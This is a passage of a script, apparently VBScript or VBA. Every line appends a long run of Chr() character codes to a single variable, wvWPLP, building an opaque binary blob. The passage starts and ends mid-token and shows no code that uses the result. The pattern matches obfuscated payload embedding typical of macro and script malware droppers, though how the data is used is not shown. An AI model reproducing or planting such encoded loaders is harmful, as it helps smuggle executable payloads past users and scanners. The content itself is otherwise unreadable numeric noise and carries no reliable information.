r(110)&Chr(15)&Chr(8)&Chr(150)&Chr(214)&Chr(107)&Chr(91)&Chr(131)&Chr(24)&Chr(166)&Chr(207)&Chr(24)&Chr(141)&Chr(72)&Chr(166)&Chr(205)&Chr(6)&Chr(32)&Chr(68)&Chr(43)&Chr(96)&Chr(239)&Chr(183)&Chr(30)&Chr(242)&Chr(247)&Chr(72)&Chr(220)&Chr(221)&Chr(95)&Chr(33)&Chr(30)&Chr(94)&Chr(95)&Chr(177)&Chr(116)&Chr(94)&Chr(15)&Chr(217)&Chr(131)&Chr(113)&Chr(160)&Chr(41)&Chr(107)&Chr(88)&Chr(233)&Chr(33)&Chr(230)&Chr(13)&Chr(88)&Chr(211)&Chr(247)&Chr(7)&Chr(60)&Chr(77)&Chr(247)&Chr(164)&Chr(228)&Chr(126)&Chr(130)&Chr(197)&Chr(27)&Chr(127)&Chr(115)&Chr(204)&Chr(120)&Chr(127)&Chr(115)&Chr(240)&Chr(127)&Chr(67)&Chr(165)&Chr(201)&Chr(10)&Chr(130)&Chr(117)&Chr(110)&Chr(4)&Chr(177)\nwvWPLP=wvWPLP&Chr(216)&Chr(199)&Chr(142)&Chr(186)&Chr(79)&Chr(23)&Chr(155)&Chr(216)&Chr(243)&Chr(139)&Chr(45)&Chr(122)&Chr(3)&Chr(219)&Chr(41)&Chr(204)&Chr(172)&Chr(252)&Chr(226)&Chr(254)&Chr(31)&Chr(68)&Chr(176)&Chr(171)&Chr(187)&Chr(179)&Chr(7)&Chr(101)&Chr(40)&Chr(19)&Chr(241)&Chr(206)&Chr(233)&Chr(170)&Chr(162)&Chr(130)&Chr(243)&Chr(46)&Chr(241)&Chr(31)&Chr(166)&Chr(227)&Chr(79)&Chr(218)&Chr(155)&Chr(23)&Chr(216)&Chr(77)&Chr(13)&Chr(29)&Chr(233)&Chr(245)&Chr(118)&Chr(75)&Chr(17)&Chr(93)&Chr(97)&Chr(210)&Chr(181)&Chr(130)&Chr(180)&Chr(249)&Chr(123)&Chr(71)&Chr(184)&Chr(118)&Chr(249)&Chr(201)&Chr(231)&Chr(125)&Chr(151)&Chr(72)&Chr(157)&Chr(75)&Chr(41)&Chr(139)&Chr(112)&Chr(44)&Chr(181)&Chr(145)&Chr(197)&Chr(211)&Chr(247)&Chr(1)&Chr(34)&Chr(209)&Chr(67)&Chr(164)&Chr(233)&Chr(33)&Chr(82)&Chr(224)&Chr(101)&Chr(59)&Chr(177)&Chr(181)&Chr(208)&Chr(202)&Chr(205)&Chr(66)\nwvWPLP=wvWPLP&Chr(50)&Chr(53)&Chr(181)&Chr(169)&Chr(48)&Chr(229)&Chr(163)&Chr(77)&Chr(164)&Chr(123)&Chr(164)&Chr(64)&Chr(219)&Chr(111)&Chr(224)&Chr(32)&Chr(191)&Chr(171)&Chr(58)&Chr(166)&Chr(181)&Chr(240)&Chr(62)&Chr(98)&Chr(207)&Chr(160)&Chr(94)&Chr(255)&Chr(211)&Chr(200)&Chr(147)&Chr(102)&Chr(104)&Chr(92)&Chr(178)&Chr(210)&Chr(138)&Chr(51)&Chr(3)&Chr(27)&Chr(244)&Chr(110)&Chr(214)&Chr(166)&Chr(52)&Chr(175)&Chr(168)&Chr(115)&Chr(191)&Chr(80)&Chr(54)&Chr(30)&Chr(166)&Chr(127)&Chr(37)&Chr(209)&Chr(112)&Chr(103)&Chr(141)&Chr(204)&Chr(82)&Chr(0)&Chr(255)&Chr(79)&Chr(9)&Chr(26)&Chr(0)&Chr(82)&Chr(121)&Chr(55)&Chr(50)&Chr(25)&Chr(248)&Chr(220)&Chr(8)&Chr(22)&Chr(129)&Chr(147)&Chr(93)&Chr(71)&Chr(146)&Chr(142)&Chr(170)&Chr(107)&Chr(223)&Chr(110)&Chr(86)&Chr(181)&Chr(178)&Chr(48)&Chr(125)&Chr(179)&Chr(63)&Chr(216)&Chr(201)&Chr(72)&Chr(21)&Chr(26)&Chr(172)&Chr(248)\nwvWPLP=wvWPLP&Chr(222)&Chr(164)&Chr(1)&Chr(147)&Chr(215)&Chr(120)&Chr(59)&Chr(103)&Chr(95)&Chr(232)&Chr(56)&Chr(138)&Chr(17)&Chr(194)&Chr(223)&Chr(51)&Chr(210)&Chr(21)&Chr(7)&Chr(208)&Chr(167)&Chr(1)&Chr(57)&Chr(43)&Chr(242)&Chr(79)&Chr(15)&Chr(147)&Chr(234)&Chr(19)&Chr(204)&Chr(218)&Chr(162)&Chr(124)&Chr(63)&Chr(69)&Chr(75)&Chr(117)&Chr(183)&Chr(72)&Chr(223)&Chr(103)&Chr(23)&Chr(214)&Chr(162)&Chr(225)&Chr(103)&Chr(115)&Chr(88)&Chr(113)&Chr(17)&Chr(11)&Chr(50)&Chr(234)&Chr(70)&Chr(67)&Chr(50)&Chr(232)&Chr(62)&Chr(18)&Chr(152)&Chr(142)&Chr(197)&Chr(106)&Chr(93)&Chr(50)&Chr(8)&Chr(198)&Chr(225)&Chr(13)&Chr(109)&Chr(252)&Chr(73)&Chr(151)&Chr(153)&Chr(127)&Chr(127)&Chr(69)&Chr(186)&Chr(8)&Chr(232)&Chr(98)&Chr(79)&Chr(63)&Chr(153)&Chr(156)&Chr(143)&Chr(225)&Chr(170)&Chr(254)&Chr(254)&Chr(162)&Chr(235)&Chr(221)&Chr(217)&Chr(142)&Chr(129)&Chr(74)&Chr(46)&Chr(112)\nwvWPLP=wvWPLP&Chr(161)&Chr(110)&Chr(25)&Chr(81)&Chr(253)&Chr(154)&Chr(98)&Chr(175)&Chr(106)&Chr(6)&Chr(122)&Chr(40)&Chr(89)&Chr(165)&Chr(26)&Chr(152)&Chr(120)&Chr(243)&Chr(105)&Chr(249)&Chr(170)&Chr(215)&Chr(116)&Chr(161)&Chr(118)&Chr(117)&Chr(6)&Chr(40)&Chr(246)&Chr(190)&Chr(242)&Chr(157)&Chr(39)&Chr(121)&Chr(253)&Chr(100)&Chr(44)&Chr(179)&Chr(60)&Chr(95)&Chr(90)&Chr(248)&Chr(181)&Chr(238)&Chr(24)&Chr(40)&Chr(247)&Chr(134)&Chr(234)&Chr(88)&Chr(195)&Chr(234)&Chr(121)&Chr(31)&Chr(176)&Chr(11)&Chr(68)&Chr(142)&Chr(149)&Chr(93)&Chr(252)&Chr(212)&Chr(86)&Chr(73)&Chr(77)&Chr(38)&Chr(81)&Chr(24)&Chr(68)&Chr(160)&Chr(226)&Chr(19)&Chr(100)&Chr(99)&Chr(10)&Chr(205)&Chr(76)&Chr(86)&Chr(76)&Chr(126)&Chr(228)&Chr(246)&Chr(175)&Chr(107)&Chr(39)&Chr(137)&Chr(254)&Chr(140)&Chr(60)&Chr(29)&Chr(112)&Chr(111)&Chr(118)&Chr(42)&Chr(193)&Chr(68)&Chr(252)&Chr(57)&Chr(191)&Chr(136)\nwvWPLP=wvWPLP&Chr(152)&Chr(180)&Chr(239)&Chr(142)&Chr(103)&Chr(225)&Chr(33)&Chr(1)&Chr(25)&Chr(38)&Chr(181)&Chr(87)&Chr(205)&Chr(123)&Chr(154)&Chr(144)&Chr(129)&Chr(14)&Chr(17)&Chr(96)&Chr(7)&Chr(144)&Chr(16)&Chr(226)&Chr(176)&Chr(66)&Chr(242)&Chr(93)&Chr(177)&Chr(220)&Chr(112)&Chr(41)&Chr(24)&Chr(180)&Chr(206)&Chr(91)&Chr(246)&Chr(14)&Chr(217)&Chr(194)&Chr(29)&Chr(151)&Chr(136)&Chr(26)&Chr(169)&Chr(145)&Chr(50)&Chr(224)&Chr(65)&Chr(180)&Chr(73)&Chr(204)&Chr(214)&Chr(230)&Chr(209)&Chr(251)&Chr(96)&Chr(178)&Chr(53)&Chr(232)&Chr(47)&Chr(183)&Chr(179)&Chr(125)&Chr(197)&Chr(58)&Chr(95)&Chr(248)&Chr(85)&Chr(176)&Chr(80)&Chr(113)&Chr(47)&Chr(244)&Chr(10)&Chr(6)&Chr(67)&Chr(191)&Chr(107)&Chr(191)&Chr(234)&Chr(34)&Chr(2)&Chr(12)&Chr(160)&Chr(199)&Chr(50)&Chr(54)&Chr(82)&Chr(54)&Chr(42)&Chr(221)&Chr(38)&Chr(115)&Chr(149)&Chr(5)&Chr(112)&Chr(166)&Chr(233)&Chr(3)\nwvWPLP=wvWPLP&Chr(41)&Chr(9)&Chr(252)&Chr(185)&Chr(54)&Chr(244)&Chr(186)&Chr(241)&Chr(126)&Chr(46)&Chr(80)&Chr(4)&Chr(3)&Chr(152)&Chr(49)&Chr(179)&Chr(200)&Chr(104)&Chr(56)&Chr(149)&Chr(125)&Chr(103)&Chr(148)&Chr(9)&Chr(102)&Chr(147)&Chr(227)&Chr(255)&Chr(85)&Chr(57)&Chr(190)&Chr(161)&Chr(99)&Chr(133)&Chr(46)&Chr(208)&Chr(93)&Chr(115)&Chr(78)&Chr(87)&Chr(225)&Chr(132)&Chr(173)&Chr(198)&Chr(89)&Chr(133)&Chr(194)&Chr(113)&Chr(88)&Chr(88)&Chr(228)&Chr(134)&Chr(80)&Chr(176)&Chr(94)&Chr(42)&Chr(142)&Chr(19)&Chr(233)&Chr(98)&Chr(234)&Chr(202)&Chr(56)&Chr(228)&Chr(127)&Chr(5)&Chr(51)&Chr(54)&Chr(72)&Chr(86)&Chr(174)&Chr(61)&Chr(167)&Chr(124)&Chr(66)&Chr(169)&Chr(159)&Chr(195)&Chr(86)&Chr(170)&Chr(227)&Chr(89)&Chr(48)&Chr(20)&Chr(249)&Chr(158)&Chr(20)&Chr(42)&Chr(130)&Chr(159)&Chr(115)&Chr(185)&Chr(223)&Chr(69)&Chr(53)&Chr(252)&Chr(51)&Chr(20)&Chr(47)&Chr(177)\nwvWPLP=wvWPLP&Chr(23)&Chr(130)&Chr(38)&Chr(166)&Chr(90)&Chr(126)&Chr(243)&Chr(202)&Chr(243)&Chr(254)&Chr(252)&Chr(195)&Chr(174)&Chr(62)&Chr(109)&Chr(186)&Chr(231)&Chr(115)&Chr(77)&Chr(26)&Chr(253)&Chr(179)&Chr(195)&Chr(54)&Chr(34)&Chr(69)&Chr(40)&Chr(139)&Chr(92)&Chr(68)&Chr(187)&Chr(17)&Chr(121)&Chr(69)&Chr(118)&Chr(194)&Chr(119)&Chr(191)&Chr(97)&Chr(108)&Chr(55)&Chr(30)&Chr(226)&Chr(100)&Chr(52)&Chr(195)&Chr(238)&Chr(55)&Chr(144)&Chr(177)&Chr(222)&Chr(61)&Chr(1)&Chr(209)&Chr(83)&Chr(41)&Chr(93)&Chr(22)&Chr(55)&Chr(24)&Chr(81)&Chr(75)&Chr(127)&Chr(198)&Chr(161)&Chr(15)&Chr(34)&Chr(232)&Chr(188)&Chr(202)&Chr(10)&Chr(194)&Chr(163)&Chr(219)&Chr(51)&Chr(116)&Chr(139)&Chr(228)&Chr(75)&Chr(120)&Chr(99)&Chr(81)&Chr(72)&Chr(177)&Chr(229)&Chr(197)&Chr(79)&Chr(171)&Chr(225)&Chr(253)&Chr(132)&Chr(41)&Chr(235)&Chr(75)&Chr(142)&Chr(80)&Chr(131)&Chr(116)&Chr(244)&Chr(109)\nwvWPLP=wvWPLP&Chr(181)&Chr(113)&Chr(230)&Chr(145)&Chr(64)&Chr(197)&Chr(117)&Chr(181)&Chr(84)&Chr(209)&Chr(226)&Chr(22)&Chr(146)&Chr(89)&Chr(182)&Chr(6)&Chr(159)&Chr(250)&Chr(138)&Chr(80)&Chr(88)&Chr(231)&Chr(63)&Chr(80)&Chr(19)&Chr(249)&Chr(241)&Chr(180)&Chr(163)&Chr(87)&Chr(160)&Chr(206)&Chr(88)&Chr(118)&Chr(15)&Chr(196)&Chr(168)&Chr(193)&Chr(92)&Chr(182)&Chr(156)&Chr(79)&Chr(137)&Chr(155)&Chr(162)&Chr(112)&Chr(132)&Chr(228)&Chr(93)&Chr(57)&Chr(205)&Chr(40)&Chr(83)&Chr(234)&Chr(153)&Chr(214)&Chr(185)&Chr(255)&Chr(40)&Chr(170)&Chr(102)&Chr(49)&Chr(253)&Chr(129)&Chr(54)&Chr(195)&Chr(192)&Chr(123)&Chr(196)&Chr(121)&Chr(5)&Chr(91)&Chr(154)&Chr(73)&Chr(79)&Chr(37)&Chr(106)&Chr(11)&Chr(60)&Chr(72)&Chr(251)&Chr(100)&Chr(98)&Chr(3)&Chr(56)&Chr(251)&Chr(4)&Chr(37)&Chr(160)&Chr(40)&Chr(111)&Chr(81)&Chr(137)&Chr(79)&Chr(81)&Chr(6)&Chr(104)&Chr(204)&Chr(47)&Chr(19)\nwvWPLP=wvWPLP&Chr(119)&Chr(185)&Chr(209)&Chr(225)&Chr(5)&Chr(207)&Chr(38)&Chr(120)&Chr(90)&Chr(243)&Chr(192)&Chr(188)&Chr(184)&Chr(12)&Chr(211)&Chr(233)&Chr(138)&Chr(157)&Chr(7)&Chr(7)&Chr(247)&Chr(71)&Chr(242)&Chr(253)&Chr(193)&Chr(236)&Chr(83)&Chr(169)&Chr(8)&Chr(31)&Chr(19)&Chr(85)&Chr(249)&Chr(32)&Chr(221)&Chr(134)&Chr(88)&Chr(76)&Chr(185)&Chr(82)&Chr(126)&Chr(166)&Chr(49)&Chr(125)&Chr(50)&Chr(164)&Chr(97)&Chr(141)&Chr(82)&Chr(179)&Chr(79)&Chr(254)&Chr(133)&Chr(105)&Chr(99)&Chr(238)&Chr(47)&Chr(150)&Chr(84)&Chr(114)&Chr(179)&Chr(144)&Chr(42)&Chr(78)&Chr(125)&Chr(145)&Chr(157)&Chr(43)&Chr(86)&Chr(225)&Chr(19)&Chr(82)&Chr(186)&Chr(176)&Chr(116)&Chr(56)&Chr(163)&Chr(216)&Chr(119)&Chr(196)&Chr(186)&Chr(220)&Chr(25)&Chr(75)&Chr(58)&Chr(9)&Chr(185)&Chr(14)&Chr(121)&Chr(108)&Chr(135)&Chr(225)&Chr(20)&Chr(200)&Chr(56)&Chr(35)&Chr(148)&Chr(98)&Chr(185)&Chr(127)\nwvWPLP=wvWPLP&Chr(128)&Chr(248)&Chr(252)&Chr(151)&Chr(64)&Chr(193)&Chr(62)&Chr(250)&Chr(184)&Chr(148)&Chr(155)&Chr(168)&Chr(67)&Chr(245)&Chr(156)&Chr(43)&Chr(36)&Chr(152)&Chr(38)&Chr(53)&Chr(167)&Chr(31)&Chr(79)&Chr(254)&Chr(229)&Chr(134)&Chr(175)&Chr(48)&Chr(196)&Chr(3)&Chr(225)&Chr(33)&Chr(90)&Chr(168)&Chr(73)&Chr(52)&Chr(128)&Chr(184)&Chr(120)&Chr(191)&Chr(238)&Chr(234)&Chr(53)&Chr(14)&Chr(107)&Chr(171)&Chr(231)&Chr(3)&Chr(152)&Chr(251)&Chr(113)&Chr(21)&Chr(39)&Chr(88)&Chr(32)&Chr(44)&Chr(81)&Chr(205)&Chr(126)&Chr(187)&Chr(180)&Chr(179)&Chr(135)&Chr(87)&Chr(56)&Chr(182)&Chr(235)&Chr(128)&Chr(51)&Chr(84)&Chr(231)&Chr(190)&Chr(55)&Chr(131)&Chr(254)&Chr(4)&Chr(243)&Chr(220)&Chr(173)&Chr(254)&Chr(251)&Chr(40)&Chr(129)&Chr(31)&Chr(249)&Chr(49)&Chr(87)&Chr(186)&Chr(161)&Chr(24)&Chr(92)&Chr(3)&Chr(35)&Chr(52)&Chr(92)&Chr(40)&Chr(20)&Chr(159)&Chr(73)&Chr(41)\nwvWPLP=wvWPLP&Chr(6)&Chr(60)&Chr(9)&Chr(199)&Chr(142)&Chr(103)&Chr(36)&Chr(25)&Chr(138)&Chr(66)&Chr(169)&Chr(52)&Chr(86)&Chr(99)&Chr(192)&Chr(51)&Chr(89)&Chr(32)&Chr(192)&Chr(228)&Chr(149)&Chr(3)&Chr(13)&Chr(29)&Chr(54)&Chr(213)&Chr(197)&Chr(83)&Chr(61)&Chr(147)&Chr(187)&Chr(196)&Chr(6)&Chr(201)&Chr(16)&Chr(103)&Chr(62)&Chr(147)&Chr(48)&Chr(189)&Chr(222)&Chr(63)&Chr(28)&Chr(18)&Chr(25)&Chr(86)&Chr(160)&Chr(151)&Chr(160)&Chr(212)&Chr(18)&Chr(37)&Chr(161)&Chr(231)&Chr(159)&Chr(39)&Chr(134)&Chr(206)&Chr(84)&Chr(36)&Chr(206)&Chr(135)&Chr(166)&Chr(192)&Chr(1)&Chr(78)&Chr(26)&Chr(101)&Chr(254)&Chr(49)&Chr(53)&Chr(34)&Chr(73)&Chr(211)&Chr(150)&Chr(22)&Chr(116)&Chr(97)&Chr(80)&Chr(205)&Chr(168)&Chr(44)&Chr(99)&Chr(185)&Chr(206)&Chr(44)&Chr(7)&Chr(50)&Chr(105)&Chr(234)&Chr(9)&Chr(6)&Chr(13)&Chr(107)&Chr(123)&Chr(216)&Chr(183)&Chr(39)&Chr(159)&Chr(253)\nwvWPLP=wvWPLP&Chr(107)&Chr(117)&Chr(167)&Chr(122)&Chr(25)&Chr(197)&Chr(171)&Chr(250)&Chr(180)&Chr(18)&Chr(16)&Chr(117)&Chr(252)&Chr(76)&Chr(17)&Chr(70)&Chr(42)&Chr(112)&Chr(19)&Chr(131)&Chr(252)&Chr(38)&Chr(79)&Chr(0)&Chr(193)&Chr(56)&Chr(101)&Chr(50)&Chr(240)&Chr(107)&Chr(146)&Chr(129)&Chr(164)&Chr(131)&Chr(39)&Chr(117)&Chr(231)&Chr(7)&Chr(208)&Chr(241)&Chr(90)&Chr(211)&Chr(34)&Chr(106)&Chr(39)&Chr(72)&Chr(92)&Chr(28)&Chr(227)&Chr(169)&Chr(229)&Chr(235)&Chr(183)&Chr(241)&Chr(228)&Chr(186)&Chr(191)&Chr(12)&Chr(151)&Chr(52)&Chr(104)&Chr(161)&Chr(84)&Chr(47)&Chr(169)&Chr(236)&Chr(7)&Chr(90)&Chr(193)&Chr(65)&Chr(191)&Chr(87)&Chr(206)&Chr(214)&Chr(57)&Chr(159)&Chr(72)&Chr(48)&Chr(185)&Chr(149)&Chr(4)&Chr(107)&Chr(46)&Chr(228)&Chr(81)&Chr(110)&Chr(57)&Chr(2)&Chr(232)&Chr(164)&Chr(133)&Chr(117)&Chr(61)&Chr(232)&Chr(11)&Chr(39)&Chr(77)&Chr(198)&Chr(86)&Chr(155)\nwvWPLP=wvWPLP&Chr(248)&Chr(225)&Chr(226)&Chr(157)&Chr(141)&Chr(189)&Chr(100)&Chr(198)&Chr(133)&Chr(227)&Chr(84)&Chr(157)&Chr(36)&Chr(7)&Chr(127)&Chr(245)&Chr(187)&Chr(173)&Chr(4)&Chr(96)&Chr(115)&Chr(91)&Chr(214)&Chr(203)&Chr(173)&Chr(147)&Chr(96)&Chr(25)&Chr(22)&Chr(241)&Chr(41)&Chr(134)&Chr(159)&Chr(250)&Chr(226)&Chr(218)&Chr(196)&Chr(87)&Chr(127)&Chr(98)&Chr(29)&Chr(19)&Chr(126)&Chr(15)&Chr(119)&Chr(223)&Chr(233)&Chr(64)&Chr(56)&Chr(21)&Chr(70)&Chr(198)&Chr(226)&Chr(24)&Chr(178)&Chr(137)&Chr(196)&Chr(8)&Chr(94)&Chr(26)&Chr(157)&Chr(163)&Chr(81)&Chr(187)&Chr(199)&Chr(144)&Chr(249)&Chr(4)&Chr(247)&Chr(115)&Chr(137)&Chr(57)&Chr(147)&Chr(8)&Chr(45)&Chr(223)&Chr(39)&Chr(221)&Chr(59)&Chr(57)&Chr(238)&Chr(181)&Chr(145)&Chr(170)&Chr(190)&Chr(173)&Chr(228)&Chr(65)&Chr(204)&Chr(60)&Chr(149)&Chr(29)&Chr(249)&Chr(51)&Chr(14)&Chr(74)&Chr(234)&Chr(91)&Chr(23)&Chr(78)\nwvWPLP=wvWPLP&Chr(18)&Chr(239)&Chr(113)&Chr(143)&Chr(166)&Chr(5)&Chr(53)&Chr(20)&Chr(94)&Chr(109)&Chr(198)&Chr(249)&Chr(82)&Chr(110)&Chr(250)&Chr(44)&Chr(26)&Chr(19)&Chr(152)&Chr(6)&Chr(35)&Chr(255)&Chr(212)&Chr(24)&Chr(110)&Chr(151)&Chr(61)&Chr(88)&Chr(80)&Chr(204)&Chr(142)&Chr(27)&Chr(51)&Chr(101)&Chr(1)&Chr(239)&Chr(29)&Chr(83)&Chr(52)&Chr(39)&Chr(68)&Chr(164)&Chr(222)&Chr(69)&Chr(22)&Chr(25)&Chr(244)&Chr(75)&Chr(201)&Chr(239)&Chr(45)&Chr(168)&Chr(145)&Chr(112)&Chr(31)&Chr(191)&Chr(227)&Chr(11)&Chr(59)&Chr(190)&Chr(231)&Chr(87)&Chr(128)&Chr(87)&Chr(26)&Chr(109)&Chr(67)&Chr(60)&Chr(192)&Chr(184)&Chr(89)&Chr(77)&Chr(236)&Chr(188)&Chr(193)&Chr(15)&Chr(14)&Chr(233)&Chr(72)&Chr(74)&Chr(34)&Chr(249)&Chr(7)&Chr(12)&Chr(245)&Chr(12)&Chr(83)&Chr(138)&Chr(90)&Chr(120)&Chr(95)&Chr(132)&Chr(139)&Chr(149)&Chr(241)&Chr(122)&Chr(72)&Chr(195)&Chr(231)&Chr(214)\nwvWPLP=wvWPLP&Chr(23)&Chr(53)&Chr(104)&Chr(181)&Chr(203)&Chr(43)&Chr(45)&Chr(234)&Chr(211)&Chr(94)&Chr(103)&Chr(155)&Chr(117)&Chr(25)&Chr(104)&Chr(129)&Chr(140)&Chr(132)&Chr(249)&Chr(15)&Chr(35)&Chr(98)&Chr(151)&Chr(135)&Chr(164)&Chr(88)&Chr(15)&Chr(68)&Chr(21)&Chr(2)&Chr(95)&Chr(113)&Chr(82)&Chr(229)&Chr(135)&Chr(82)&Chr(173)&Chr(58)&Chr(247)&Chr(233)&Chr(185)&Chr(137)&Chr(98)&Chr(128)&Chr(162)&Chr(240)&Chr(161)&Chr(118)&Chr(121)&Chr(198)&Chr(11)&Chr(167)&Chr(236)&Chr(64)&Chr(0)&Chr(182)&Chr(118)&Chr(206)&Chr(195)&Chr(85)&Chr(93)&Chr(165)&Chr(210)&Chr(250)&Chr(232)&Chr(43)&Chr(99)&Chr(120)&Chr(64)&Chr(34)&Chr(131)&Chr(133)&Chr(179)&Chr(149)&Chr(202)&Chr(143)&Chr(96)&Chr(254)&Chr(217)&Chr(238)&Chr(173)&Chr(118)&Chr(246)&Chr(87)&Chr(65)&Chr(44)&Chr(80)&Chr(250)&Chr(235)&Chr(45)&Chr(207)&Chr(86)&Chr(216)&Chr(11)&Chr(16)&Chr(125)&Chr(155)&Chr(209)&Chr(11)&Chr(99)\nwvWPLP=wvWPLP&Chr(6)&Chr(232)&Chr(31)&Chr(239)&Chr(232)&Chr(15)&Chr(64)&Chr(12)&Chr(219)&Chr(167)&Chr(185)&Chr(172)&Chr(162)&Chr(86)&Chr(28)&Chr(98)&Chr(4)&Chr(245)&Chr(20)&Chr(152)&Chr(31)&Chr(126)&Chr(204)&Chr(227)&Chr(205)&Chr(154)&Chr(245)&Chr(240)&Chr(224)&Chr(161)&Chr(237)&Chr(131)&Chr(51)&Chr(180)&Chr(125)&Chr(60)&Chr(107)&Chr(70)&Chr(125)&Chr(49)&Chr(233)&Chr(156)&Chr(81)&Chr(8)&Chr(168)&Chr(175)&Chr(181)&Chr(73)&Chr(43)&Chr(81)&Chr(238)&Chr(17)&Chr(235)&Chr(49)&Chr(85)&Chr(144)&Chr(40)&Chr(228)&Chr(191)&Chr(76)&Chr(247)&Chr(226)&Chr(43)&Chr(197)&Chr(255)&Chr(239)&Chr(197)&Chr(74)&Chr(73)&Chr(185)&Chr(103)&Chr(46)&Chr(6)&Chr(208)&Chr(249)&Chr(101)&Chr(57)&Chr(179)&Chr(95)&Chr(80)&Chr(64)&Chr(106)&Chr(58)&Chr(103)&Chr(166)&Chr(76)&Chr(151)&Chr(64)&Chr(138)&Chr(186)&Chr(165)&Chr(207)&Chr(116)&Chr(223)&Chr(148)&Chr(112)&Chr(75)&Chr(9)&Chr(53)&Chr(216)\nwvWPLP=wvWPLP&Chr(164)&Chr(146)&Chr(37)&Chr(178)&Chr(157)&Chr(197)&Chr(99)&Chr(142)&Chr(129)&Chr(132)&Chr(76)&Chr(142)&Chr(53)&Chr(49)&Chr(218)&Chr(62)&Chr(248)&Chr(102)&Chr(117)&Chr(91)&Chr(17)&Chr(110)&Chr(172)&Chr(238)&Chr(48)&Chr(214)&Chr(233)&Chr(200)&Chr(84)&Chr(190)&Chr(225)&Chr(179)&Chr(125)&Chr(142)&Chr(113)&Chr(250)&Chr(109)&Chr(253)&Chr(90)&Chr(145)&Chr(29)&Chr(42)&Chr(52)&Chr(64)&Chr(26)&Chr(8)&Chr(91)&Chr(149)&Chr(112)&Chr(218)&Chr(137)&Chr(2)&Chr(30)&Chr(159)&Chr(65)&Chr(190)&Chr(24)&Chr(106)&Chr(208)&Chr(211)&Chr(139)&Chr(97)&Chr(145)&Chr(173)&Chr(174)&Chr(229)&Chr(140)&Chr(140)&Chr(118)&Chr(44)&Chr(64)&Chr(17)&Chr(176)&Chr(128)&Chr(54)&Chr(112)&Chr(253)&Chr(120)&Chr(49)&Chr(80)&Chr(135)&Chr(23)&Chr(67)&Chr(212)&Chr(3)&Chr(253)&Chr(108)&Chr(200)&Chr(147)&Chr(132)&Chr(50)&Chr(147)&Chr(22)&Chr(111)&Chr(192)&Chr(42)&Chr(149)&Chr(198)&Chr(161)&Chr(21)\nwvWPLP=wvWPLP&Chr(112)&Chr(92)&Chr(121)&Chr(102)&Chr(22)&Chr(122)&Chr(244)&Chr(161)&Chr(193)&Chr(245)&Chr(31)&Chr(229)&Chr(206)&Chr(45)&Chr(47)&Chr(128)&Chr(147)&Chr(197)&Chr(186)&Chr(127)&Chr(197)&Chr(183)&Chr(251)&Chr(218)&Chr(2)&Chr(138)&Chr(144)&Chr(85)&Chr(154)&Chr(13)&Chr(60)&Chr(120)&Chr(158)&Chr(224)&Chr(113)&Chr(175)&Chr(113)&Chr(143)&Chr(153)&Chr(27)&Chr(233)&Chr(85)&Chr(140)&Chr(202)&Chr(3)&Chr(237)&Chr(54)&Chr(241)&Chr(224)&Chr(140)&Chr(158)&Chr(80)&Chr(221)&Chr(105)&Chr(50)&Chr(171)&Chr(179)&Chr(93)&Chr(108)&Chr(134)&Chr(110)&Chr(185)&Chr(242)&Chr(102)&Chr(27)&Chr(16)&Chr(113)&Chr(182)&Chr(192)&Chr(220)&Chr(155)&Chr(77)&Chr(118)&Chr(44)&Chr(100)&Chr(82)&Chr(44)&Chr(128)&Chr(78)&Chr(53)&Chr(24)&Chr(216)&Chr(176)&Chr(136)&Chr(45)&Chr(19)&Chr(72)&Chr(127)&Chr(7)&Chr(55)&Chr(236)&Chr(113)&Chr(111)&Chr(63)&Chr(255)&Chr(142)&Chr(250)&Chr(172)&Chr(137)&Chr(14)\nwvWPLP=wvWPLP&Chr(71)&Chr(157)&Chr(93)&Chr(205)&Chr(73)&Chr(131)&Chr(24)&Chr(15)&Chr(184)&Chr(121)&Chr(1)&Chr(140)&Chr(128)&Chr(130)&Chr(209)&Chr(37)&Chr(193)&Chr(109)&Chr(5)&Chr(141)&Chr(41)&Chr(234)&Chr(3)&Chr(146)&Chr(204)&Chr(61)&Chr(0)&Chr(105)&Chr(214)&Chr(34)&Chr(96)&Chr(204)&Chr(175)&Chr(24)&Chr(228)&Chr(150)&Chr(159)&Chr(106)&Chr(133)&Chr(149)&Chr(30)&Chr(253)&Chr(229)&Chr(189)&Chr(217)&Chr(176)&Chr(121)&Chr(77)&Chr(19)&Chr(195)&Chr(138)&Chr(155)&Chr(36)&Chr(4)&Chr(20)&Chr(81)&Chr(152)&Chr(168)&Chr(17)&Chr(120)&Chr(237)&Chr(68)&Chr(109)&Chr(174)&Chr(252)&Chr(244)&Chr(105)&Chr(221)&Chr(214)&Chr(55)&Chr(124)&Chr(236)&Chr(225)&Chr(76)&Chr(33)&Chr(116)&Chr(247)&Chr(42)&Chr(81)&Chr(61)&Chr(250)&Chr(199)&Chr(24)&Chr(170)&Chr(72)&Chr(191)&Chr(241)&Chr(7)&Chr(195)&Chr(246)&Chr(77)&Chr(234)&Chr(137)&Chr(94)&Chr(114)&Chr(189)&Chr(31)&Chr(226)&Chr(27)&Chr(191)\nwvWPLP=wvWPLP&Chr(42)&Chr(245)&Chr(129)&Chr(134)&Chr(220)&Chr(21)&Chr(123)&Chr(182)&Chr(127)&Chr(219)&Chr(228)&Chr(119)&Chr(255)&Chr(117)&Chr(129)&Chr(239)&Chr(166)&Chr(134)&Chr(217)&Chr(209)&Chr(152)&Chr(76)&Chr(141)&Chr(215)&Chr(91)&Chr(19)&Chr(168)&Chr(26)&Chr(18)&Chr(232)&Chr(214)&Chr(33)&Chr(38)&Chr(125)&Chr(42)&Chr(212)&Chr(122)&Chr(73)&Chr(63)&Chr(114)&Chr(57)&Chr(78)&Chr(28)&Chr(109)&Chr(99)&Chr(225)&Chr(64)&Chr(76)&Chr(182)&Chr(124)&Chr(193)&Chr(63)&Chr(235)&Chr(58)&Chr(174)&Chr(249)&Chr(71)&Chr(63)&Chr(248)&Chr(27)&Chr(130)&Chr(208)&Chr(192)&Chr(34)&Chr(151)&Chr(175)&Chr(199)&Chr(188)&Chr(109)&Chr(182)&Chr(128)&Chr(243)&Chr(33)&Chr(227)&Chr(207)&Chr(2)&Chr(71)&Chr(121)&Chr(185)&Chr(156)&Chr(227)&Chr(230)&Chr(70)&Chr(61)&Chr(75)&Chr(78)&Chr(101)&Chr(225)&Chr(189)&Chr(92)&Chr(170)&Chr(39)&Chr(86)&Chr(205)&Chr(221)&Chr(112)&Chr(48)&Chr(160)&Chr(14)&Chr(246)\nwvWPLP=wvWPLP&Chr(164)&Chr(137)&Chr(252)&Chr(103)&Chr(127)&Chr(18)&Chr(224)&Chr(86)&Chr(19)&Chr(251)&Chr(60)&Chr(165)&Chr(38)&Chr(148)&Chr(60)&Chr(116)&Chr(145)&Chr(133)&Chr(66)&C